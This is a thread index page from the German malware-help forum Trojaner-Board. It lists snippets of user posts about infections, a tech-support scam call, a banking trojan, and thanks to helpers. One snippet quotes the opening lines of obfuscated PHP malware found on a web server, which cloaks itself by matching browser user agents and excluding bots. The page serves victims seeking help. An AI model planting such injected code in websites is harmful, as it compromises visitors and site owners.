Zurück   Trojaner-Board > Themen

Alles zum Thema: Geschichte

  Letzter Beitrag Antworten Hits Forum
Vielen Dank für die super Unterstützung bei meinem Problem
Geschichte - Ich hatte ein Problem, ich fand eine Seite und auf dieser Seite fähige und kompetente Hilfe. Mein Problem ist Geschichte und ich weiß nun, an wen ich mich im Notfall wenden kann. Noch mal vielen Dank für die super Unterstützung und die schnelle Hilfe. :daumenhoc
Lob, Kritik und Wünsche
Sandboxie, Driveby & Avast
Geschichte - Hallo, ich besuchte letzte Woche eine Seite Names phonakc-om, um einen provisorischenOnline Hörtest zumachen(eine längere Geschichte). Hatte den aktuellen FF in der Sandbox laufen, die Seite in noscript temporär freigegeben und avast schlug sofort an. Ein Problem, trojaner irgendwas, sei...
Diskussionsforum
Vielen Dank an M-K-D-B und schrauber
Geschichte - Danke an M-K-D-B, durch dessen Hilfe die Malware auf meinem PC innerhalb kurzer Zeit Geschichte war :) Nachträglich auch noch einmal vielen Dank an schrauber, der mir vor zwei Jahren schon bei einem ähnlichen Problem geholfen hat! Was ihr hier macht ist wirklich super!
Lob, Kritik und Wünsche
Merkwürdiger Telefonanruf - PC aus dem Auland gehackt?
Geschichte - Folgendes ist mir eben passiert: jemand mit unbekannter Tel.-Nr. ruft mich auf dem Festnetz an. Er spricht englisch und erklärt mir er sei von einer "XY"-Software Firma. Aus dem Ausland sei mein PC gehackt worden und er möchte nun mit mir zusammen das Problem lösen. Ich möchte doch bitte jetzt...
Plagegeister aller Art und deren Bekämpfung
Hijack im Netzwerk?
Geschichte - Guten Morgen, und zwar gibts hier in meiner kleinen Firma, wo ich arbeite ein Problem. Wir sind hier 10 Mitarbeiter und jeder dieser Mitarbeiter hat seinen eigenen PC. Sobald man ins Internet geht (unabhängig von welchem PC), ploppen die für den Hijack bekannten Werbeseiten auf. Meist mit...
Plagegeister aller Art und deren Bekämpfung
Banking Trojaner
Geschichte - Moin zusammen, meine Schwiegermutter hat sich auch ein den Banking Trojaner gefangen. Beim Login auf der Sparkassen Seite kam die bekannte Geschichte mit dem Demo-Konto und der Test Überweisung. Banking ist nun gesperrt worden seitens der Parkasse nach einem Anruf... Würde mir einer behilflich...
Plagegeister aller Art und deren Bekämpfung
Alter Fehler wieder da ... DNS Settings have been changed
Geschichte - Hallo Community - Ich merke gerade ich habe gegen die erst goldene Regel verstoßen. Mein Problem, das ständige wechseln der DNS Settings laut glasswire hatte ich schon im Januar, bzw es ist mir im Januar aufgefallen nachdem ich Glasswire installiert hatte. Und in diesem Thread...
Plagegeister aller Art und deren Bekämpfung
pua/downloadguide.gen
Geschichte - Wie im Titel beschrieben liegt dieses Problem: pua/downloadguide.gen vor. Avira hat ihn vor paar tagen gefunden in Quarantäne gesetzt und dann wieder. Mit AdwCleaner auch hinterher gehauen und alles gelöscht was er finden konnte (was nicht viel war bis auf eine hotkey geschichte die nicht in...
Log-Analyse und Auswertung
Browserprobleme und Virenbefahl?
Geschichte - Hallo Ich habe vor einiger Zeit einige Virusmeldungen durch Antivir bekommen und dachte ich hätte sie behoben. Jetzt habe ich vorhin versucht auf eine normale und sichere Seite zuzugreifen und anstatt der Seite öffnete sich die Seite Adultfriendfinder (anscheinend irgendein dubioser...
Plagegeister aller Art und deren Bekämpfung
PC bleibt beim anklicken von PDF-Dateien oder dem Facebook-Login mit Firefox kurz hängen
Geschichte - Hallo, hatte dieses Problem früher schon mal, mit einer älteren FF Version. Grade hat es sich wieder zurück gemeldet, keine Ahnung warum. Evtl hatts damit zu tun, daß ich gestern einen link aus der Ixquick-Suche anklickte, irgendwas mit cnet, da blieb er nämlich das erste mal hängen, also...
Alles rund um Windows
Komische Ip taucht auf
Geschichte - Hallo zusammen! Ich habe ein kleines Problem, bzw. bin mir unsicher ob ich eins habe. Wenn ich über die Cmd meine Verbindungen abfrage (mit netstat -n) taucht neuerdings immer eine Ip auf, die vorher nie da war. Hintergrund der Geschichte, warum ich überhaupt drauf aufmerksam geworden bin,...
Plagegeister aller Art und deren Bekämpfung
Alles probiert, komme nicht weiter, habe keine Ahnung, schwarzer Bildschirm nach Windowsupdate
Geschichte - Pc wurde neu installiert nach ähnlichen Problemen. Nach 1 Tag Probleme beim Start, ist als ob umgeschaltet wird. Beim Update des Virenscanners Fehlermedung. Auffällig viele Meldungen des Vierenscanners über Änderungen der Starteinstellungen durch Datei Service.exe. Datei ist gesperrt,, verweigert...
Log-Analyse und Auswertung
Laptop stellt keine WLAN Verbindung her - Smartphone dagegen schon
Geschichte - Hallo, ich habe folgendes Problem. Mein Laptop verbindet sich nicht mit meinem WLAN Router. Der Router ist eine Fritz!Box 7330 SL von 1&1. Mein Laptop läuft derzeit mit Windows 8.1. Mit anderen WLAN Routern hatte ich bisher keine Probleme. Wenn ich mich jedoch mit dem jetzigen verbinden will,...
Alles rund um Windows
Habe Probleme mit meinem Pc (Internet)
Geschichte - Ich schreibe jezt keine große geschichte, aber ich habe Probleme mit dem internet...es lädt langsam,öffnet sich langsam etc. ich will nur wissen ob ich etwas am Pc habe (Virus,Trojaner,etc,..) danke
Plagegeister aller Art und deren Bekämpfung
Browser- und Googleverlauf durch Dritte verändert
Geschichte - Hallo ihr Lieben, bitte steinigt mich nicht, falls mein Anliegen im ersten Moment etwas seltsam klingt und vielleicht nicht ausschließlich hier hin gehört. Ich weiß im Moment nur noch nicht, an wen ich mich wenden soll und möchte daher erst einmal den technischen Hintergrund abchecken, bevor...
Plagegeister aller Art und deren Bekämpfung
Windows Updatesuche funktioniert nicht - Fehlercode 8024402F
Geschichte - Hallo Leute, ich habe bei meine Sony Vaio Windows 8.1 folgendes Problem und bin eigentlich nur zufällig durch das Softwareupdateprogramm von Avast darauf gestoßen: Ich wollte ein Adobe Flashplayer Update durchführen und das brachte mich zum Windows Update Programm. Geht man auf "Updates...
Plagegeister aller Art und deren Bekämpfung
Virus - Es besteht keine Internetverbindung, bitte warten
Geschichte - Guten Abend zusammen, ich bin neu in eurem Forum und benötige Hilfe für ein neues/altes Problem. Habe vorhin etwas Zeit gehabt und meinen alten Tower usw rausgekramt und wollte mal sehen ob er noch funktioniert ( seit 5-6 Jahren Laptopuser). Gesagt, getan, das " alte " Schätzchen fährt zwar...
Plagegeister aller Art und deren Bekämpfung
Vielen, vielen Dank an Schrauber!
Geschichte - Das ist echt eine der besten Geschichten. Es ist wirklich toll, dass es Euch hier im Trojaner Board gibt. Mein ganz besonderer Dank geht hier an Schrauber!!! Ohne Dich wäre ich echt aufgeschmissen werden. Vielen, vielen Dank, dass Du so gut, schnell und kompetent hier geholfen hast. Ich bin echt...
Lob, Kritik und Wünsche
Firefox-einstellungen 32.0.3 und frage zu wechselnden IP-Adr.
Geschichte - hallo alle miteinander, habe euch letztes jahr durch zufall gefunden und mir schon geholfen:dankeschoen: und HUT AB vor eurer arbeit... (ld. finde ich kein dingens smiley) haha eben warnt mich avira, befinde mich auf ner gefährlichen seite :lach: kurz zur info, habe durch ein hirnschaden...
Überwachung, Datenschutz und Spam
Wlan verbindung zeigt Fehler an?!
Geschichte - Ich hoffe ich bin hier richtig und ihr könnt mir helfen, bin schon fast am verzweifeln. Hier mal meine Geschichte: Hallo, ich habe mir vor ca. 3 Monaten ein gebrauchtes HTC Sensation XL gekauft. Als ich zuhause war hab ich es erstmal in Werkstellung zurückgesetzt und danach komplett neu...
Smartphone, Tablet & Handy Security
HP-Scanner 8600 nicht mehr ansprechbar nach div. "Reparatur"-Durchläufen (Win 8)
Geschichte - Hallo, ich habe in der verg. Woche unter Anleitung von cosinus meinen Rechner sehr erfolgreich von div. Malware befreit und div. andere hilfreiche Anregungen umgesetzt. http://www.trojaner-board.de/157152-win-8-firefox-malware-leitet-werbeseiten-um-doppelt-unterstrichene-begriffe.html An...
Alles rund um Windows
Browser öffnet alleine Werbe-Seiten (z.B Java-Aktualisierungen; Casino o. Finanzen), zeigt auf den Seiten übermäßig viel Werbung an.
Geschichte - Guten Abend. Ich kenne mich leider mit so Geschichten wie Viren, Trojanern etc. kein bisschen aus. Jetzt habe ich das Problem das mein Browser (egal ob Google Chrome, Firefox o. Explorer) ständig neue Seiten im Hintergrund öffnet, was das Surfen im Internet unerträglich macht :killpc:. Wenn...
Log-Analyse und Auswertung
Schadsoftware auf Webserver (PHP)
Geschichte - Auf einem Webserver fand ich folgenden Schadcode: #c18fce# error_reporting(0); ini_set('display_errors',0); $wp_j6451 = @$_SERVER; if (( preg_match ('/Gecko|MSIE/i', $wp_j6451) && !preg_match ('/bot/i', $wp_j6451))){...
Alles rund um Mac OSX & Linux
Ich musste in Windows 8 ein Microsoft-Konto anlegen!
Geschichte - Guten Tag ans Forum, wenn ich schreibe, ich musste so ein Konto anlegen, ist das natürlich kein Zwang gewesen, aber hier ist die Geschichte: 1. Ich habe ein E.book gekauft 2. Das habe ich dann heruntergeladen und 3. musste dann, um es lesen zu können, eine Software installieren, diese ist:...
Alles rund um Windows
Massive Probleme mit Bluescreens..
Geschichte - Ich habe seit kurzem folgendes Problem .. Mein Lappy war jetzt zwei Wochen in Reperatur weil meine Festplatte scheinbar einen Knacks weghatte (Bluescreen: Kernel Stack Inpage Error). Daraufhin hat man mir (angeblich,kann leider nicht nachprüfen obs stimmt,da ich dummerweise meine...
Plagegeister aller Art und deren Bekämpfung
Archiv
Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.